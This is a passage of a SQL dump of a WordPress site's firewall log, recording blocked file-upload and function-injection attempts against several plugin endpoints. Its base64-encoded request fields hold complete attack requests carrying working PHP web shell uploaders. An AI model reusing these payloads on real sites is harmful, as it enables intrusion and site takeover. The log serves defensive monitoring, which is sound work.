(Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvL3dwLWFkbWluL2FkbWluLWFqYXgucGhwP2FjdGlvbj1nZXRjb3VudHJ5dXNlciZjcz0yIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PWJhOWE0NWEyYmYyZGE0ODg2MDU4NWY0Zjk3MDNlMmQ3CkNvbnRlbnQtTGVuZ3RoOiAxNDczCgotLWJhOWE0NWEyYmYyZGE0ODg2MDU4NWY0Zjk3MDNlMmQ3CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0icG9waW1nIjsgZmlsZW5hbWU9InNldHRpbmdzX2F1dG8ucGhwIgpDb250ZW50LVR5cGU6IApFeHBpcmVzOiAwCgo8dGl0bGU+VnVsbiEhIHBhdGNoIGl0IE5vdyE8L3RpdGxlPg0KPD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRzID0gJzx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+PD9waHAgZWNobyBcJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPlwnO2VjaG8gXCc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+XCc7aWYoICRfUE9TVFsiX3VwbCJdID09ICJVcGxvYWQiICkge2lmKEBjb3B5KCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwgJF9GSUxFU1siZmlsZSJdWyJuYW1lIl0pKSB7IGVjaG8gIjxiPlNoZWxsIFVwbG9hZGVkICEgOik8Yj48YnI+PGJyPiI7IH1lbHNlIHsgZWNobyAiPGI+Tm90IHVwbG9hZGVkICEgPC9iPjxicj48YnI+IjsgfX0\\/Pic7DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIjsNCiR0ZXh0ID0gJHM7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdnVsbi5odG0iIDsNCiR0ZXh0MiA9ICdWdWxuISEgcGF0Y2ggaXQgTm93ISc7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQo\\/Pg0KCi0tYmE5YTQ1YTJiZjJkYTQ4ODYwNTg1ZjRmOTcwM2UyZDctLQo=\"}'),(175083,1604952571.302982,1604952570.211300,'\0\0\0\0\0\0\0\0\0\0RfL',0,403,0,0,0,'http://ashbyresort.com//wp-admin/admin-post.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"Ly93cC1hZG1pbi9hZG1pbi1wb3N0LnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvL3dwLWFkbWluL2FkbWluLXBvc3QucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTIxMWEwOTU0YjE5NTRiOTQ1ODJkOWJiYjRkNzFiNjQyCkNvbnRlbnQtTGVuZ3RoOiAxNjY5CgotLTIxMWEwOTU0YjE5NTRiOTQ1ODJkOWJiYjRkNzFiNjQyCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2V0dGluZ3NfdXBsb2FkIgoKc2V0dGluZ3MKLS0yMTFhMDk1NGIxOTU0Yjk0NTgyZDliYmI0ZDcxYjY0MgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InBhZ2UiCgpwYWdlbGluZXMKLS0yMTFhMDk1NGIxOTU0Yjk0NTgyZDliYmI0ZDcxYjY0MgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0ic2V0dGluZ3NfYXV0by5waHAiCkNvbnRlbnQtVHlwZTogCkV4cGlyZXM6IDAKCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJHMgPSAnPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT48P3BocCBlY2hvIFwnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+XCc7ZWNobyBcJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT5cJztpZiggJF9QT1NUWyJfdXBsIl0gPT0gIlVwbG9hZCIgKSB7aWYoQGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSkpIHsgZWNobyAiPGI+U2hlbGwgVXBsb2FkZWQgISA6KTxiPjxicj48YnI+IjsgfWVsc2UgeyBlY2hvICI8Yj5Ob3QgdXBsb2FkZWQgISA8L2I+PGJyPjxicj4iOyB9fT8+JzsNCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3dwLWNvbnRlbnQvdnVsbi5waHAiOw0KJHRleHQgPSAkczsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gJ1Z1bG4hISBwYXRjaCBpdCBOb3chJzsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoKLS0yMTFhMDk1NGIxOTU0Yjk0NTgyZDliYmI0ZDcxYjY0Mi0tCg==\"}'),(175084,1604992122.434091,1604992099.304500,'\0\0\0\0\0\0\0\0\0\0\rD',0,403,0,0,0,'http://ashbyresort.com/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image',NULL,'Mozilla/5.0 (Linux; Android 5.0; SM-G920A) AppleWebKit (KHTML, like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvaW5kZXgucGhwP29wdGlvbj1jb21fZ21hcGZwJmNvbnRyb2xsZXI9ZWRpdGxpZXV4JnRtcGw9Y29tcG9uZW50JnRhc2s9dXBsb2FkX2ltYWdlIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNS4wOyBTTS1HOTIwQSkgQXBwbGVXZWJLaXQgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUgTW9iaWxlIFNhZmFyaSAoY29tcGF0aWJsZTsgQWRzQm90LUdvb2dsZS1Nb2JpbGU7ICtodHRwOi8vd3d3Lmdvb2dsZS5jb20vbW9iaWxlL2Fkc2JvdC5odG1sKQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PWZjOWQ0ZTJiMGNlOTY1YzkzZjA1MWRlY2Q1NWM3Yjk4CkNvbnRlbnQtTGVuZ3RoOiAxMDUwCgotLWZjOWQ0ZTJiMGNlOTY1YzkzZjA1MWRlY2Q1NWM3Yjk4CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibm9faHRtbCIKCm5vX2h0bWwKLS1mYzlkNGUyYjBjZTk2NWM5M2YwNTFkZWNkNTVjN2I5OApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Im9wdGlvbiIKCmNvbV9nbWFwZnAKLS1mYzlkNGUyYjBjZTk2NWM5M2YwNTFkZWNkNTVjN2I5OApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImltYWdlMSI7IGZpbGVuYW1lPSJ4c2FteGFkb28ucGhwLmpwZyIKQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnCkV4cGlyZXM6IDAKCjw\\/JHN0ciA9ICdYc2FtX1hhZG9vX0JvVCc7ZWNobyBiYXNlNjRfZW5jb2RlKCRzdHIpPz48P3BocCBlY2hvICc8YnI+UFJJVkVUIEJPVCBCWSBYU2FtLVhBZG9vJy4nPGJyPicuJ1VuYW1lOicucGhwX3VuYW1lKCkuJzxicj4nLiRjd2QgPSBnZXRjd2QoKTsgRWNobyAnPGNlbnRlcj4gIDxmb3JtIG1ldGhvZD0icG9zdCIgdGFyZ2V0PSJfc2VsZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+ICA8aW5wdXQgdHlwZT0iZmlsZSIgc2l6ZT0iMjAiIG5hbWU9InVwbG9hZHMiIC8+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJ1cGxvYWQiIC8+ICA8L2Zvcm0+ICA8L2NlbnRlcj48L3RkPjwvdHI+IDwvdGFibGU+PGJyPic7IGlmICghZW1wdHkgKCRfRklMRVNbJ3VwbG9hZHMnXSkpIHsgICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyd1cGxvYWRzJ11bJ3RtcF9uYW1lJ10sJF9GSUxFU1sndXBsb2FkcyddWyduYW1lJ10pOyAgICAgRWNobyAiPHNjcmlwdD5hbGVydCgndXBsb2FkIERvbmUnKTsgCSAJIDwvc2NyaXB0PjxiPlVwbG9hZGVkICEhITwvYj48YnI+bmFtZSA6ICIuJF9GSUxFU1sndXBsb2FkcyddWyduYW1lJ10uIjxicj5zaXplIDogIi4kX0ZJTEVTWyd1cGxvYWRzJ11bJ3NpemUnXS4iPGJyPnR5cGUgOiAiLiRfRklMRVNbJ3VwbG9hZHMnXVsndHlwZSddOyB9ID8+Ci0tZmM5ZDRlMmIwY2U5NjVjOTNmMDUxZGVjZDU1YzdiOTgtLQo=\"}'),(175085,1605057653.118098,1605057649.044200,'\0\0\0\0\0\0\0\0\0\04y',0,403,0,0,0,'https://ashbyresort.com/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"file_upload\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL2NoZXJyeS1wbHVnaW4vYWRtaW4vaW1wb3J0LWV4cG9ydC91cGxvYWQucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApYLUh0dHBzOiAxCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9ZjM4YmQzMzRkZDQwNTFiNDA0MWMxNDIyYjlkYjI3MjMKQ29udGVudC1MZW5ndGg6IDUyMgoKLS1mMzhiZDMzNGRkNDA1MWI0MDQxYzE0MjJiOWRiMjcyMwpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iMTk5ODc3LnBocCIKQ29udGVudC1UeXBlOiAKRXhwaXJlczogMAoKPD9waHANCmVjaG8gIlJhaXowV29yTSI7DQplY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7DQplY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J3piJz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQogIGlmKEBjb3B5KCRfRklMRVNbJ3piJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ3piJ11bJ25hbWUnXSkpIHsNCiAgZWNobyAiZVhwbG9pdGluZyBEb25lIjsNCiAgfSBlbHNlIHsNCiAgZWNobyAiRmFpbGVkIHRvIFVwbG9hZC4iOw0KICB9DQp9DQo\\/PgotLWYzOGJkMzM0ZGQ0MDUxYjQwNDFjMTQyMmI5ZGIyNzIzLS0K\"}'),(175086,1605126428.381126,1605126426.079900,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php','http://ashbyresort.com/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haXQtY3N2LWltcG9ydC1leHBvcnQvYWRtaW4vdXBsb2FkLWhhbmRsZXIucGhw\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvYWl0LWNzdi1pbXBvcnQtZXhwb3J0L2FkbWluL3VwbG9hZC1oYW5kbGVyLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL2FzaGJ5cmVzb3J0LmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWl0LWNzdi1pbXBvcnQtZXhwb3J0L2FkbWluL3VwbG9hZC1oYW5kbGVyLnBocApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NDsgcnY6NTYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83Mi4wCgo=\"}'),(175087,1605126432.337508,1605126431.572200,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php','http://ashbyresort.com/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haXQtY3N2LWltcG9ydC1leHBvcnQvYWRtaW4vdXBsb2FkLWhhbmRsZXIucGhw\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvYWl0LWNzdi1pbXBvcnQtZXhwb3J0L2FkbWluL3VwbG9hZC1oYW5kbGVyLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL2FzaGJ5cmVzb3J0LmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWl0LWNzdi1pbXBvcnQtZXhwb3J0L2FkbWluL3VwbG9hZC1oYW5kbGVyLnBocApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NDsgcnY6NTYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83Mi4wClgtSHR0cHM6IDEKCg==\"}'),(175088,1605501126.196329,1605501125.390100,'\0\0\0\0\0\0\0\0\0\0b',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Function Injection in Multiple Themes using Epsilon Framework <= 1.2.1','{\"learningMode\":0,\"failedRules\":\"285\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZXhwY29tNS9wdWJsaWNfaHRtbC9hc2hieXJlc29ydC5jb20vd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbnRlbnQtTGVuZ3RoOiAxMjAKCmFjdGlvbj13ZWxjb21lX3NjcmVlbl9hamF4X2NhbGxiYWNrJmFyZ3MlNUJhY3Rpb24lNUQlNUIwJTVEPWVnZGZnJmFyZ3MlNUJhY3Rpb24lNUQlNUIxJTVEPWRmZ2RmZyZhcmdzJTVCYXJncyU1RD1kZmdkZmdmZw==\"}'),(175089,1605501125.700806,1605501124.926700,'\0\0\0\0\0\0\0\0\0\0\r',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Function Injection in Multiple Themes using Epsilon Framework <= 1.2.1','{\"learningMode\":0,\"failedRules\":\"285\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZXhwY29tNS9wdWJsaWNfaHRtbC9hc2hieXJlc29ydC5jb20vd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbnRlbnQtTGVuZ3RoOiAxMjAKCmFjdGlvbj13ZWxjb21lX3NjcmVlbl9hamF4X2NhbGxiYWNrJmFyZ3MlNUJhY3Rpb24lNUQlNUIwJTVEPWVnZGZnJmFyZ3MlNUJhY3Rpb24lNUQlNUIxJTVEPWRmZ2RmZyZhcmdzJTVCYXJncyU1RD1kZmdkZmdmZw==\"}'),(175090,1605501124.764673,1605501124.000800,'\0\0\0\0\0\0\0\0\0\0b',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Function Injection in Multiple Themes using Epsilon Framework <= 1.2.1','{\"learningMode\":0,\"failedRules\":\"285\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZXhwY29tNS9wdWJsaWNfaHRtbC9hc2hieXJlc29ydC5jb20vd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbnRlbnQtTGVuZ3RoOiAxMjMKCmFjdGlvbj1lcHNpbG9uX2Rhc2hib2FyZF9hamF4X2NhbGxiYWNrJmFyZ3MlNUJhY3Rpb24lNUQlNUIwJTVEPWVnZGZnJmFyZ3MlNUJhY3Rpb24lNUQlNUIxJTVEPWRmZ2RmZyZhcmdzJTVCYXJncyU1RD1kZmdkZmdmZw==\"}'),(175091,1605501124.406231,1605501123.540200,'\0\0\0\0\0\0\0\0\0\0\r',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Function Injection in Multiple Themes using Epsilon Framework <= 1.2.1','{\"learningMode\":0,\"failedRules\":\"285\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZXhwY29tNS9wdWJsaWNfaHRtbC9hc2hieXJlc29ydC5jb20vd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"rce\",\"ssl\":1,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQWNjZXB0LUVuY29kaW5nOiBnemlwCkNvbm5lY3Rpb246IGNsb3NlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg0LjAuNDE0Ny4xMjUgU2FmYXJpLzUzNy4zNgpYLUh0dHBzOiAxCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbnRlbnQtTGVuZ3RoOiAxMjMKCmFjdGlvbj1lcHNpbG9uX2Rhc2hib2FyZF9hamF4X2NhbGxiYWNrJmFyZ3MlNUJhY3Rpb24lNUQlNUIwJTVEPWVnZGZnJmFyZ3MlNUJhY3Rpb24lNUQlNUIxJTVEPWRmZ2RmZyZhcmdzJTVCYXJncyU1RD1kZmdkZmdmZw==\"}'),(175092,1605501123.465929,1605501122.700300,'\0\0\0\0\0\0\0\0\0\0b',0,403,0,0,0,'https://ashbyresort.com/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Function Injection in Multiple Themes using Epsilon Framework <= 